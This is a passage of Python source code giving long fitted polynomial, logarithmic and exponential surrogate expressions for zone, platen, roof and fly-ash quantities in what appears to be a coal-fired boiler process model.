-2.37475 * b.wall_temperature_waterwall[t, 1]*b.secondary_air_inlet.temperature[t] \
-0.208333 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-171.455 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+306.026 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
-0.15677 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 6] \
+1.33655 * b.wall_temperature_waterwall[t, 4]*b.secondary_air_inlet.temperature[t] \
+0.485426 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 10] \
+0.374308 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 12] \
-0.828451 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_waterwall[t, 12] \
-0.180578 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_roof[t] \
-13.9066 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
-671.924 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
+0.538709 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 11] \
-56.0447 * b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t] \
-712.621 * b.wall_temperature_waterwall[t, 10]*b.SR[t] \
+44.9712 * b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t] \
+75.2145 * b.wall_temperature_waterwall[t, 12]*b.ratio_PA2coal[t] \
-5.25712 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+0.836281 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-693841 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-489211 * b.flowrate_coal_raw[t]*b.SR[t] \
+199410 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+409.786 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-9506.34 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+1.57634e+07 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-9269.71 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
+7874.35 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
-575.815 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.019545 * (b.wall_temperature_waterwall[t, 11]*b.ratio_PA2coal[t])**2 \
-0.000956923 * (b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t])**2 \
+26897.5 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
-3926.81 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-6.04217e-05 * (b.wall_temperature_waterwall[t, 4]*b.SR[t])**3 \
+39.5236 * (b.flowrate_coal_raw[t]*b.SR[t])**3)",
# Zone 11 surrogate.
11: "(265.482 * b.wall_temperature_waterwall[t, 1] \
+24.2531 * b.wall_temperature_waterwall[t, 2] \
-632.925 * b.wall_temperature_waterwall[t, 3] \
+114.247 * b.wall_temperature_waterwall[t, 4] \
+28.3431 * b.wall_temperature_waterwall[t, 5] \
+445.719 * b.wall_temperature_waterwall[t, 6] \
+1363.91 * b.wall_temperature_waterwall[t, 7] \
+595.684 * b.wall_temperature_waterwall[t, 8] \
+1378.1 * b.wall_temperature_waterwall[t, 9] \
+1082.57 * b.wall_temperature_waterwall[t, 10] \
+29176.4 * b.wall_temperature_waterwall[t, 11] \
+385.741 * b.wall_temperature_waterwall[t, 12] \
-9989.8 * b.wall_temperature_platen[t] \
-387.904 * b.wall_temperature_roof[t] \
+459422 * b.flowrate_coal_raw[t] \
-8.16755e+06 * b.mf_H2O_coal_raw[t] \
-2.7349e+06 * b.SR[t] \
+2.68906e+07 * b.SR_lf[t] \
-3539.12 * b.secondary_air_inlet.temperature[t] \
+341694 * b.ratio_PA2coal[t] \
+143448 * log(b.wall_temperature_waterwall[t, 1]) \
+137163 * log(b.wall_temperature_waterwall[t, 3]) \
-174890 * log(b.wall_temperature_waterwall[t, 4]) \
-283768 * log(b.wall_temperature_waterwall[t, 6]) \
-313430 * log(b.wall_temperature_waterwall[t, 7]) \
-421769 * log(b.wall_temperature_waterwall[t, 8]) \
-498950 * log(b.wall_temperature_waterwall[t, 9]) \
-628469 * log(b.wall_temperature_waterwall[t, 10]) \
-4.79246e+06 * log(b.wall_temperature_waterwall[t, 11]) \
+2.7541e+06 * log(b.wall_temperature_platen[t]) \
-30902.5 * log(b.flowrate_coal_raw[t]) \
+423000 * log(b.SR[t]) \
-2.62773e+07 * log(b.SR_lf[t]) \
-856849 * log(b.secondary_air_inlet.temperature[t]) \
-976839 * exp(b.SR_lf[t]) \
-18.8883 * b.wall_temperature_waterwall[t, 11]**2 \
-397.68 * b.flowrate_coal_raw[t]**2 \
+0.00509064 * b.wall_temperature_platen[t]**3 \
+0.000109843 * b.wall_temperature_roof[t]**3 \
-13.0398 * b.flowrate_coal_raw[t]**3 \
-7.10244e+06 * b.mf_H2O_coal_raw[t]**3 \
-0.475103 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 12] \
-1.28357 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
+86.2882 * b.wall_temperature_waterwall[t, 1]*b.SR[t] \
+446.141 * b.wall_temperature_waterwall[t, 1]*b.SR_lf[t] \
-0.996705 * b.wall_temperature_waterwall[t, 1]*b.secondary_air_inlet.temperature[t] \
+0.0280906 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
+0.232787 * b.wall_temperature_waterwall[t, 2]*b.secondary_air_inlet.temperature[t] \
-48.0401 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+162.375 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
+297.717 * b.wall_temperature_waterwall[t, 3]*b.SR_lf[t] \
+0.232195 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
+2.02509 * b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t] \
+0.0771506 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 12] \
-2.17805 * b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t] \
+2186.86 * b.wall_temperature_waterwall[t, 6]*b.mf_H2O_coal_raw[t] \
-2.97757 * b.wall_temperature_waterwall[t, 6]*b.ratio_PA2coal[t] \
-0.0238492 * b.wall_temperature_waterwall[t, 7]*b.wall_temperature_waterwall[t, 11] \
+226.047 * b.wall_temperature_waterwall[t, 7]*b.SR[t] \
-1085.84 * b.wall_temperature_waterwall[t, 7]*b.SR_lf[t] \
+0.236826 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_waterwall[t, 10] \
-2.73927 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+539.145 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
-0.104024 * b.wall_temperature_waterwall[t, 9]*b.wall_temperature_roof[t] \
-291.787 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
+13.4721 * b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t] \
-124.929 * b.wall_temperature_waterwall[t, 10]*b.SR[t] \
-15.757 * b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t] \
-4817.97 * b.wall_temperature_waterwall[t, 11]*b.SR[t] \
+1892.85 * b.wall_temperature_waterwall[t, 11]*b.SR_lf[t] \
+1.63258 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+2676.98 * b.wall_temperature_platen[t]*b.SR[t] \
+0.49742 * b.wall_temperature_platen[t]*b.secondary_air_inlet.temperature[t] \
-72.8604 * b.wall_temperature_platen[t]*b.ratio_PA2coal[t] \
+0.430275 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-310586 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-142967 * b.flowrate_coal_raw[t]*b.SR[t] \
+88449.6 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+217.961 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-7117.74 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+6.1753e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-3411.28 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-106414 * b.mf_H2O_coal_raw[t]*b.ratio_PA2coal[t] \
+845856 * b.SR[t]*b.SR_lf[t] \
+4202.28 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
-340.792 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
-5.1335e-05 * (b.wall_temperature_waterwall[t, 9]*b.flowrate_coal_raw[t])**2 \
-0.000310581 * (b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t])**2 \
+1.18396 * (b.wall_temperature_waterwall[t, 11]*b.SR[t])**2 \
-0.716778 * (b.wall_temperature_platen[t]*b.SR[t])**2 \
+11739 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
-2422.02 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-0.000797508 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+16.1006 * (b.flowrate_coal_raw[t]*b.ratio_PA2coal[t])**2 \
-0.0417793 * (b.wall_temperature_waterwall[t, 6]*b.mf_H2O_coal_raw[t])**3 \
+19.1183 * (b.flowrate_coal_raw[t]*b.SR[t])**3)",
# Zone 12 surrogate.
12: "(220.386 * b.wall_temperature_waterwall[t, 1] \
+67.4508 * b.wall_temperature_waterwall[t, 2] \
-53.5201 * b.wall_temperature_waterwall[t, 3] \
+168.186 * b.wall_temperature_waterwall[t, 4] \
+164.298 * b.wall_temperature_waterwall[t, 5] \
+274.74 * b.wall_temperature_waterwall[t, 6] \
+159.494 * b.wall_temperature_waterwall[t, 7] \
+274.631 * b.wall_temperature_waterwall[t, 8] \
+589.546 * b.wall_temperature_waterwall[t, 9] \
+692.692 * b.wall_temperature_waterwall[t, 10] \
-125.502 * b.wall_temperature_waterwall[t, 11] \
+43494.6 * b.wall_temperature_waterwall[t, 12] \
-33880.3 * b.wall_temperature_platen[t] \
-9863.55 * b.wall_temperature_roof[t] \
+241200 * b.flowrate_coal_raw[t] \
+2.77276e+07 * b.mf_H2O_coal_raw[t] \
-2.88054e+06 * b.SR[t] \
+1.06869e+07 * b.SR_lf[t] \
-14610.7 * b.secondary_air_inlet.temperature[t] \
+172036 * b.ratio_PA2coal[t] \
+47797.2 * log(b.wall_temperature_waterwall[t, 1]) \
-11594.2 * log(b.wall_temperature_waterwall[t, 3]) \
-125501 * log(b.wall_temperature_waterwall[t, 4]) \
-144576 * log(b.wall_temperature_waterwall[t, 6]) \
-198449 * log(b.wall_temperature_waterwall[t, 7]) \
-221594 * log(b.wall_temperature_waterwall[t, 8]) \
-199032 * log(b.wall_temperature_waterwall[t, 9]) \
-258237 * log(b.wall_temperature_waterwall[t, 10]) \
-387498 * log(b.wall_temperature_waterwall[t, 11]) \
-1.13543e+07 * log(b.wall_temperature_waterwall[t, 12]) \
+8.627e+06 * log(b.wall_temperature_platen[t]) \
+3.05064e+06 * log(b.wall_temperature_roof[t]) \
-246256 * log(b.flowrate_coal_raw[t]) \
-79998 * log(b.mf_H2O_coal_raw[t]) \
+2.16333e+06 * log(b.SR[t]) \
-1.1065e+07 * log(b.SR_lf[t]) \
+4.91018e+06 * log(b.secondary_air_inlet.temperature[t]) \
-2.68698e+07 * exp(b.mf_H2O_coal_raw[t]) \
-23.3046 * b.wall_temperature_waterwall[t, 12]**2 \
+16.9006 * b.wall_temperature_platen[t]**2 \
+4.26692 * b.wall_temperature_roof[t]**2 \
+1231.98 * b.flowrate_coal_raw[t]**2 \
+4.60765 * b.secondary_air_inlet.temperature[t]**2 \
-20.1062 * b.flowrate_coal_raw[t]**3 \
-0.0208005 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_platen[t] \
+0.211335 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
+142.559 * b.wall_temperature_waterwall[t, 1]*b.SR[t] \
-0.708488 * b.wall_temperature_waterwall[t, 1]*b.secondary_air_inlet.temperature[t] \
+0.104243 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-43.2466 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+84.0522 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
-0.097681 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 6] \
+0.168211 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
+0.0311415 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_platen[t] \
-201.961 * b.wall_temperature_waterwall[t, 5]*b.SR_lf[t] \
+0.0979395 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_platen[t] \
+152.533 * b.wall_temperature_waterwall[t, 7]*b.SR[t] \
+0.138216 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_waterwall[t, 12] \
+358.824 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
-1.73455 * b.wall_temperature_waterwall[t, 9]*b.flowrate_coal_raw[t] \
-132.667 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
-0.128919 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_roof[t] \
-1.61439 * b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t] \
-51.0787 * b.wall_temperature_waterwall[t, 10]*b.SR[t] \
+0.415955 * b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t] \
-109.65 * b.wall_temperature_waterwall[t, 11]*b.SR[t] \
+976.739 * b.wall_temperature_waterwall[t, 11]*b.SR_lf[t] \
-3.17061 * b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t] \
-220.696 * b.wall_temperature_waterwall[t, 12]*b.SR[t] \
+31.6233 * b.wall_temperature_waterwall[t, 12]*b.ratio_PA2coal[t] \
+3.78535 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+2053.18 * b.wall_temperature_platen[t]*b.SR[t] \
+0.387234 * b.wall_temperature_platen[t]*b.secondary_air_inlet.temperature[t] \
-46.3757 * b.wall_temperature_platen[t]*b.ratio_PA2coal[t] \
+0.097768 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
+2.52659 * b.wall_temperature_roof[t]*b.ratio_PA2coal[t] \
-249015 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-15466 * b.flowrate_coal_raw[t]*b.SR[t] \
+58532.1 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+121.404 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-3138.31 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+2.05815e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-164857 * b.mf_H2O_coal_raw[t]*b.SR_lf[t] \
-2532.86 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-861.46 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
-209.784 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.00576341 * (b.wall_temperature_waterwall[t, 11]*b.ratio_PA2coal[t])**2 \
-0.000253398 * (b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t])**2 \
-0.592335 * (b.wall_temperature_platen[t]*b.SR[t])**2 \
+9328.86 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
-2333.23 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
+3.15989e+06 * (b.mf_H2O_coal_raw[t]*b.SR[t])**2 \
+1.25506 * (b.SR[t]*b.secondary_air_inlet.temperature[t])**2 \
-0.000219682 * (b.wall_temperature_waterwall[t, 12]*b.SR_lf[t])**3 \
+14.8923 * (b.flowrate_coal_raw[t]*b.SR[t])**3)",
"pl": "(411941 * b.wall_temperature_waterwall[t, 1] \
+2599.73 * b.wall_temperature_waterwall[t, 2] \
-946.452 * b.wall_temperature_waterwall[t, 3] \
+3366.98 * b.wall_temperature_waterwall[t, 4] \
+208.286 * b.wall_temperature_waterwall[t, 5] \
+9022.67 * b.wall_temperature_waterwall[t, 6] \
+1152.84 * b.wall_temperature_waterwall[t, 7] \
+5576.24 * b.wall_temperature_waterwall[t, 8] \
+9303.39 * b.wall_temperature_waterwall[t, 9] \
+8901.32 * b.wall_temperature_waterwall[t, 10] \
+2840.75 * b.wall_temperature_waterwall[t, 11] \
-110147 * b.wall_temperature_waterwall[t, 12] \
+259512 * b.wall_temperature_platen[t] \
-54879.5 * b.wall_temperature_roof[t] \
+4.15488e+06 * b.flowrate_coal_raw[t] \
-3.15854e+07 * b.mf_H2O_coal_raw[t] \
-2.10085e+07 * b.SR[t] \
+1.70259e+08 * b.SR_lf[t] \
-34982.2 * b.secondary_air_inlet.temperature[t] \
+1.74171e+06 * b.ratio_PA2coal[t] \
-1.05527e+08 * log(b.wall_temperature_waterwall[t, 1]) \
-9.8091e+06 * log(b.wall_temperature_waterwall[t, 4]) \
-2.12136e+06 * log(b.wall_temperature_waterwall[t, 6]) \
-1.71391e+06 * log(b.wall_temperature_waterwall[t, 7]) \
-2.30845e+06 * log(b.wall_temperature_waterwall[t, 8]) \
-2.87745e+06 * log(b.wall_temperature_waterwall[t, 9]) \
-4.14628e+06 * log(b.wall_temperature_waterwall[t, 10]) \
+2.58819e+06 * log(b.wall_temperature_waterwall[t, 11]) \
+3.70654e+07 * log(b.wall_temperature_waterwall[t, 12]) \
+1.33648e+07 * log(b.wall_temperature_platen[t]) \
+1.645e+07 * log(b.wall_temperature_roof[t]) \
-2.78402e+06 * log(b.flowrate_coal_raw[t]) \
+1.22061e+08 * log(b.SR[t]) \
-1.80973e+08 * log(b.SR_lf[t]) \
+2.24892e+07 * log(b.secondary_air_inlet.temperature[t]) \
-256.702 * b.wall_temperature_waterwall[t, 1]**2 \
+44.0874 * b.wall_temperature_waterwall[t, 12]**2 \
-127.481 * b.wall_temperature_platen[t]**2 \
+22.8917 * b.wall_temperature_roof[t]**2 \
-1180.45 * b.flowrate_coal_raw[t]**2 \
+0.0704504 * b.wall_temperature_waterwall[t, 1]**3 \
-95.2406 * b.flowrate_coal_raw[t]**3 \
-3.57179e+08 * b.mf_H2O_coal_raw[t]**3 \
-1.32576 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 8] \
+0.503933 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 10] \
-2.70951 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-6.71086 * b.wall_temperature_waterwall[t, 1]*b.secondary_air_inlet.temperature[t] \
-2.22919 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 4] \
+0.766666 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-441.236 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+1018.32 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
+0.631224 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_platen[t] \
+1.77501 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
+12571.3 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
+0.0318959 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 12] \
-2.82968 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_waterwall[t, 12] \
-5.14737 * b.wall_temperature_waterwall[t, 6]*b.secondary_air_inlet.temperature[t] \
+10.3483 * b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t] \
+1588.54 * b.wall_temperature_waterwall[t, 7]*b.SR[t] \
-24.8692 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+4266.37 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
-1.72834 * b.wall_temperature_waterwall[t, 9]*b.wall_temperature_roof[t] \
-20.1069 * b.wall_temperature_waterwall[t, 9]*b.flowrate_coal_raw[t] \
-1743.83 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
+72.025 * b.wall_temperature_waterwall[t, 9]*b.ratio_PA2coal[t] \
-21.9304 * b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t] \
-604.996 * b.wall_temperature_waterwall[t, 10]*b.SR[t] \
-0.803033 * b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t] \
-25055.4 * b.wall_temperature_waterwall[t, 11]*b.SR[t] \
+15039.3 * b.wall_temperature_waterwall[t, 11]*b.SR_lf[t] \
-6.70118 * b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t] \
+259.828 * b.wall_temperature_waterwall[t, 12]*b.ratio_PA2coal[t] \
-882.85 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+13754.4 * b.wall_temperature_platen[t]*b.mf_H2O_coal_raw[t] \
-264793 * b.wall_temperature_platen[t]*b.SR[t] \
+4.22028 * b.wall_temperature_platen[t]*b.secondary_air_inlet.temperature[t] \
-466.574 * b.wall_temperature_platen[t]*b.ratio_PA2coal[t] \
+1.01125 * b.wall_temperature_roof[t]*b.flowrate_coal_raw[t] \
+4891.17 * b.wall_temperature_roof[t]*b.mf_H2O_coal_raw[t] \
+2.58075 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-2.74627e+06 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-600924 * b.flowrate_coal_raw[t]*b.SR[t] \
+688577 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+1399.54 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-32498.3 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+1.81724e+07 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-25011.8 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-26275 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
-2285.29 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+6.03477 * (b.wall_temperature_waterwall[t, 11]*b.SR[t])**2 \
+0.0812934 * (b.wall_temperature_waterwall[t, 11]*b.ratio_PA2coal[t])**2 \
+0.00133992 * (b.wall_temperature_platen[t]*b.flowrate_coal_raw[t])**2 \
+131.081 * (b.wall_temperature_platen[t]*b.SR[t])**2 \
+74778.6 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
-18994.8 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
+3.50946e+07 * (b.mf_H2O_coal_raw[t]*b.SR[t])**2 \
+19.4424 * (b.SR[t]*b.secondary_air_inlet.temperature[t])**2 \
-0.0016092 * (b.wall_temperature_waterwall[t, 4]*b.SR[t])**3 \
-0.0295869 * (b.wall_temperature_platen[t]*b.SR[t])**3 \
+127.257 * (b.flowrate_coal_raw[t]*b.SR[t])**3)",
"roof": "(279.354 * b.wall_temperature_waterwall[t, 1] \
+142.292 * b.wall_temperature_waterwall[t, 2] \
-82.9421 * b.wall_temperature_waterwall[t, 3] \
+273.335 * b.wall_temperature_waterwall[t, 4] \
+892.852 * b.wall_temperature_waterwall[t, 5] \
+348.631 * b.wall_temperature_waterwall[t, 6] \
+1436.58 * b.wall_temperature_waterwall[t, 7] \
+905.29 * b.wall_temperature_waterwall[t, 8] \
+979.254 * b.wall_temperature_waterwall[t, 9] \
+1221.17 * b.wall_temperature_waterwall[t, 10] \
-688.783 * b.wall_temperature_waterwall[t, 11] \
+2284.85 * b.wall_temperature_waterwall[t, 12] \
-40634 * b.wall_temperature_platen[t] \
+34289.7 * b.wall_temperature_roof[t] \
+358502 * b.flowrate_coal_raw[t] \
+4.78726e+07 * b.mf_H2O_coal_raw[t] \
+4.59178e+07 * b.SR[t] \
+2.01021e+07 * b.SR_lf[t] \
-14947.3 * b.secondary_air_inlet.temperature[t] \
+317109 * b.ratio_PA2coal[t] \
+100628 * log(b.wall_temperature_waterwall[t, 1]) \
-259749 * log(b.wall_temperature_waterwall[t, 4]) \
-246590 * log(b.wall_temperature_waterwall[t, 6]) \
-442193 * log(b.wall_temperature_waterwall[t, 7]) \
-431568 * log(b.wall_temperature_waterwall[t, 8]) \
-441819 * log(b.wall_temperature_waterwall[t, 9]) \
-668967 * log(b.wall_temperature_waterwall[t, 10]) \
+1.31422e+06 * log(b.wall_temperature_waterwall[t, 11]) \
-1.2249e+06 * log(b.wall_temperature_waterwall[t, 12]) \
+1.01753e+07 * log(b.wall_temperature_platen[t]) \
-7.76406e+06 * log(b.wall_temperature_roof[t]) \
-168868 * log(b.flowrate_coal_raw[t]) \
-155788 * log(b.mf_H2O_coal_raw[t]) \
+3.56858e+06 * log(b.SR[t]) \
+1.09389e+07 * log(b.SR_lf[t]) \
+5.70227e+06 * log(b.secondary_air_inlet.temperature[t]) \
-4.72384e+07 * exp(b.mf_H2O_coal_raw[t]) \
+20.1487 * b.wall_temperature_platen[t]**2 \
-20.9093 * b.wall_temperature_roof[t]**2 \
+2180.83 * b.flowrate_coal_raw[t]**2 \
-9.65879e+06 * b.SR[t]**2 \
+4.36136 * b.secondary_air_inlet.temperature[t]**2 \
-33.3553 * b.flowrate_coal_raw[t]**3 \
-0.290778 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
+221.494 * b.wall_temperature_waterwall[t, 1]*b.SR[t] \
-1.07102 * b.wall_temperature_waterwall[t, 1]*b.secondary_air_inlet.temperature[t] \
+0.0884997 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-56.5688 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+112.139 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
+0.228812 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
-0.233352 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 8] \
-689.204 * b.wall_temperature_waterwall[t, 5]*b.SR_lf[t] \
+0.183533 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_platen[t] \
+2.40284 * b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t] \
+324.697 * b.wall_temperature_waterwall[t, 7]*b.SR[t] \
-1168.41 * b.wall_temperature_waterwall[t, 7]*b.SR_lf[t] \
+492.766 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
-2.8134 * b.wall_temperature_waterwall[t, 9]*b.flowrate_coal_raw[t] \
+0.256616 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 11] \
-0.25843 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_roof[t] \
+19.2408 * b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t] \
-138.355 * b.wall_temperature_waterwall[t, 10]*b.SR[t] \
-4483.2 * b.wall_temperature_waterwall[t, 11]*b.SR[t] \
+1985.73 * b.wall_temperature_waterwall[t, 11]*b.SR_lf[t] \
-3.09845 * b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t] \
+60.349 * b.wall_temperature_waterwall[t, 12]*b.ratio_PA2coal[t] \
+3.7545 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+3376.5 * b.wall_temperature_platen[t]*b.SR[t] \
-81.1028 * b.wall_temperature_platen[t]*b.ratio_PA2coal[t] \
-10.9151 * b.wall_temperature_roof[t]*b.flowrate_coal_raw[t] \
+638.803 * b.wall_temperature_roof[t]*b.mf_H2O_coal_raw[t] \
+0.212785 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-388386 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-55185.6 * b.flowrate_coal_raw[t]*b.SR[t] \
+84891 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+226.151 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-8510.32 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+3.64716e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-4313.24 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-4.91759e+07 * b.SR[t]*b.SR_lf[t] \
-2591.82 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
-343.32 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
-0.0526747 * (b.wall_temperature_waterwall[t, 9]*b.SR[t])**2 \
-0.000385934 * (b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t])**2 \
+1.16051 * (b.wall_temperature_waterwall[t, 11]*b.SR[t])**2 \
-0.947626 * (b.wall_temperature_platen[t]*b.SR[t])**2 \
+13089.9 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
-3406.54 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-0.000648143 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+20.2802 * (b.flowrate_coal_raw[t]*b.ratio_PA2coal[t])**2 \
+5.86754e+06 * (b.mf_H2O_coal_raw[t]*b.SR[t])**2 \
+9.71079e+06 * (b.SR[t]*b.SR_lf[t])**2 \
+2.31621 * (b.SR[t]*b.secondary_air_inlet.temperature[t])**2 \
+22.1927 * (b.flowrate_coal_raw[t]*b.SR[t])**3)",
"flyash": "(exp(7.78102e-05 * b.wall_temperature_waterwall[t, 1] \
-7.54006e-05 * b.wall_temperature_waterwall[t, 2] \
-3.89992e-05 * b.wall_temperature_waterwall[t, 3] \
